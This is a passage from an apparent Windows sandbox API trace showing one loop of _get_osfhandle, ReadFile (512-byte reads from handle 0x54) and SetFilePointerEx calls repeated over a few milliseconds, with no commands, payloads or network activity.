dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.297] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.297] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.297] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.297] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.297] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.297] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.297] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.297] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.297] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.297] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.297] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.298] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.298] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.298] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, 
lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.298] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.298] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.298] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.298] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.298] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.298] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.298] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.298] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.298] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.298] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.298] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.298] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.298] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.298] _get_osfhandle (_FileHandle=4) returned 0x54 
[0094.298] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.298] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.298] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.298] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.298] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.299] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.299] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.299] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.299] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.299] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.299] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.299] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.299] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.299] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.299] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.299] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.299] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.299] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.299] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.299] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.299] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.299] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.299] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.299] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.299] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.299] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.299] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.300] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, 
lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.300] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.300] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.300] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.300] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.300] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.300] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.300] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.300] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.300] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.300] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.300] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.300] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.300] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.300] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0094.300] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.300] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.300] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.300] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.300] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.300] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.300] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.301] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.301] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.301] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.301] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.301] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.301] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 
[0094.301] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.301] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.301] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.301] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.301] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.301] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.301] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.301] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.301] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.301] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.301] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.301] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.301] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.301] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.301] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.301] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.301] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.301] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.302] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.302] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.302] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.302] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.302] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.302] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.302] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.302] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.302] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.302] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.302] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.302] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.302] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.302] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.302] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.302] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.302] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.302] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.302] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.302] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.302] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.303] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.303] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.303] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, 
lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.303] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.303] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.303] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.303] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.303] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.303] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.303] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.303] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.303] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.303] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.303] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.303] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.303] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.303] _get_osfhandle (_FileHandle=4) returned 0x54 
[0094.303] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.303] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.303] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.303] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.303] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.304] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.304] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.304] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.304] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.304] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.304] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.304] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.304] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.304] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.304] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.304] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.304] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.304] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.304] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.304] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.304] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.304] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.304] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.304] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.304] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.304] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.304] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.305] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, 
